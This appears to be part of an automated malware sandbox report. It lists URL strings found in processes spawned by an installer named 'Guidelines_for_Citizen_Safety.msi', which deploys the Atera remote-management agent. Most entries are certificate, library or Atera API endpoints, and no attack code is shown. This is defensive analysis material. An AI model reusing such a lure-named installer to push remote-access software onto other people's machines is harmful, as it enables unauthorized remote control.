                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.5.dr, Newtonsoft.Json.dll.18.drString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/l
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com:80/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlche
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com:80/DigiCertTrustedRootG4.crl
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED49000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EEC90000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED7B000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1537471670.00000158EEFEF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B0344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED1F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EEC90000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03DE000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, System.ValueTuple.dll.2.dr, 6c6863.msi.2.dr, Pubnub.dll.2.dr, ICSharpCode.SharpZipLib.dll.2.dr, Newtonsoft.Json.dll.2.dr, AgentPackageAgentInformation.exe.15.dr, Atera.AgentPackage.Common.dll.15.dr, Newtonsoft.Json.dll.15.dr, 6c6861.msi.2.dr, AteraAgent.exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0H
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl3
                              Source: AteraAgent.exe, 0000000D.00000002.1537471670.00000158EEFEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl=
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlU
                              Source: AteraAgent.exe, 0000000D.00000002.1537471670.00000158EF00F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlmQ
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.5.dr, Newtonsoft.Json.dll.18.drString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/kPO
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com:80/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlche
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                              Source: 77EC63BDA74BD0D0E0426DC8F80085060.15.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B0363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabonK
                              Source: AgentPackageAgentInformation.exe, 00000013.00000000.1743436849.000002AC4FE22000.00000002.00000001.01000000.00000018.sdmp, AgentPackageAgentInformation.exe.15.drString found in binary or memory: http://dl.google.com/googletalk/googletalk-setup.exe
                              Source: Newtonsoft.Json.dll.18.drString found in binary or memory: http://james.newtonking.com/projects/json
                              Source: rundll32.exe, 00000006.00000002.1457102090.0000000000758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msdn.micros
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B0340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B0363000.00000004.00000020.00020000.00000000.sdmp, 8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A9440.15.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rh
                              Source: 698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB0.13.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxL
                              Source: AteraAgent.exe, 0000000F.00000002.2643291786.00000188AFFC2000.00000004.00000020.00020000.00000000.sdmp, C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.13.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/OW#
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/P
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03B3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B0340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/l
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/t
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED1F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EEC90000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03DE000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, System.ValueTuple.dll.2.dr, 6c6863.msi.2.dr, Pubnub.dll.2.dr, ICSharpCode.SharpZipLib.dll.2.dr, Newtonsoft.Json.dll.2.dr, AgentPackageAgentInformation.exe.15.dr, Atera.AgentPackage.Common.dll.15.dr, Newtonsoft.Json.dll.15.dr, 6c6861.msi.2.dr, AteraAgent.exe.2.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000013.00000002.1778616808.000002AC6900B000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000017.00000002.2230821396.000002C46BDF2000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000017.00000002.2230821396.000002C46BD96000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2393836236.0000020EDC907000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2393367410.0000020EDC8A6000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, C56C4404C4DEF0DC88E5FCD9F09CB2F1.15.dr, System.ValueTuple.dll.2.dr, 6c6863.msi.2.dr, Pubnub.dll.2.dr, ICSharpCode.SharpZipLib.dll.2.dr, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, AgentPackageAgentInformation.exe.15.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, System.ValueTuple.dll.2.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, Pubnub.dll.2.dr, ICSharpCode.SharpZipLib.dll.2.dr, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, AgentPackageAgentInformation.exe.15.dr, Newtonsoft.Json.dll.5.dr, Atera.AgentPackage.Common.dll.15.dr, Newtonsoft.Json.dll.15.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0K
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0N
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Newtonsoft.Json.dll.5.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, Newtonsoft.Json.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0O
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EEC90000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, System.ValueTuple.dll.2.dr, 6c6863.msi.2.dr, Pubnub.dll.2.dr, ICSharpCode.SharpZipLib.dll.2.dr, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, AgentPackageAgentInformation.exe.15.dr, Newtonsoft.Json.dll.5.dr, Atera.AgentPackage.Common.dll.15.dr, Newtonsoft.Json.dll.15.dr, 6c6861.msi.2.dr, Newtonsoft.Json.dll.18.dr, AteraAgent.exe.2.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRS
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED43000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2637180822.0000018896EF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF
                              Source: AteraAgent.exe, 0000000D.00000002.1533766772.00000158EC97D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2643291786.00000188AFFC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7Nfjgt
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:800
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80G
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80ystemprofile
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertAssuredIDRootCA.crl%-
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FD3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897F00000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FE5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897C55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ps.pndsn.com
                              Source: AteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
                              Source: AteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                              Source: AteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceProcess
                              Source: rundll32.exe, 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000013.00000002.1777274260.000002AC50783000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000017.00000002.2229922038.000002C4536AF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2391164954.0000020EC410F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: http://wixtoolset.org
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Microsoft.Deployment.WindowsInstaller.dll.18.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Microsoft.Deployment.WindowsInstaller.dll.18.drString found in binary or memory: http://wixtoolset.org/news/
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Microsoft.Deployment.WindowsInstaller.dll.18.drString found in binary or memory: http://wixtoolset.org/releases/
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED1F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EEC90000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03DE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, System.ValueTuple.dll.2.dr, 6c6863.msi.2.dr, Pubnub.dll.2.dr, ICSharpCode.SharpZipLib.dll.2.dr, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, AgentPackageAgentInformation.exe.15.dr, Newtonsoft.Json.dll.5.dr, Atera.AgentPackage.Common.dll.15.dr, Newtonsoft.Json.dll.15.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: AteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                              Source: AteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.oh
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FAA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.P
                              Source: rundll32.exe, 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.aterD
                              Source: rundll32.exe, 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.aterDZ
                              Source: AgentPackageAgentInformation.exe, 00000019.00000002.2391164954.0000020EC410F000.00000004.00000800.00020000.00000000.sdmp, AlphaControlAgentInstallation.dll.5.dr, AlphaControlAgentInstallation.dll.6.dr, AlphaControlAgentInstallation.dll.18.dr, AlphaControlAgentInstallation.dll.4.drString found in binary or memory: https://agent-api.atera.com
